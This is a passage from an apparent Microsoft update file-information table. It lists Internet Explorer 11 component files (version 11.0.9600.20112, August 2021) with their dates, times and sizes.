\nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 39,424 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 32,768 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 37,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 38,400 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 30,720 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 25,600 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 24,576 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 35,840 
\nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 20,992 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 21,504 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 21,504 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 46,592 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 56,320 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 57,856 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 49,664 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 47,616 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 49,152 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 55,296 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 45,056 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 39,424 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 35,840 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 51,200 \nwininet.dll.mui| 
11.0.9600.20112| 19-Aug-2021| 18:30| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 53,760 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \ninetcpl.cpl| 11.0.9600.20112| 13-Aug-2021| 19:35| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 
19-Aug-2021| 18:25| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 10,752 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 307,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 293,888 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 290,304 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 299,008 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 
18:21| 303,104 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 282,112 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 283,648 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 291,840 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 299,520 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 275,968 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 293,376 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 258,048 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 256,512 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 288,256 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 285,184 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 297,472 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 288,768 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 286,208 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 281,600 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 286,720 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 292,352 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 242,176 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 243,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 243,200 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 65,536 \nF12Resources.dll.mui| 
11.0.9600.20112| 19-Aug-2021| 18:18| 73,728 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 78,848 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 74,752 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 62,464 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 75,264 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 72,192 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 73,216 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 41,472 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 37,888 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 70,656 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 71,680 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 69,632 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 
19-Aug-2021| 18:37| 59,904 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 30,720 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.20112| 13-Aug-2021| 19:45| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.20112| 13-Aug-2021| 19:46| 230,912 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 46,080 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 51,712 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 54,272 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 45,056 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 39,936 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 39,424 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 51,200 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 
19-Aug-2021| 18:32| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 35,328 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 11,264 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 9,216 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,240 \noccache.dll.mui| 11.0.9600.20112| 
19-Aug-2021| 18:30| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 123,392 
\n \n### Internet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- 
\nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 20:01| 372,224 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 
809,472 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:03| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:03| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 60,416 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:24| 13,312 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:22| 417,280 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 92,672 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 1,359,872 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:35| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 17:51| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 20:12| 116,224 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:22| 48,640 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:34| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 20:14| 222,720 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:10| 870,400 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:15| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 5-Mar-2021| 22:16| 85,548 \nWindows Information Bar.wav| Not versioned| 5-Mar-2021| 22:16| 23,308 \nWindows Feed Discovered.wav| Not versioned| 5-Mar-2021| 22:16| 19,884 \nWindows Navigation Start.wav| Not versioned| 5-Mar-2021| 22:16| 11,340 \nbing.ico| Not versioned| 5-Mar-2021| 22:15| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 20:12| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:52| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:54| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 1,862,656 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:21| 88,064 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 1,217,024 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 152,064 \ndesktop.ini| Not versioned| 5-Mar-2021| 22:14| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 262,144 \ndesktop.ini| Not versioned| 5-Mar-2021| 
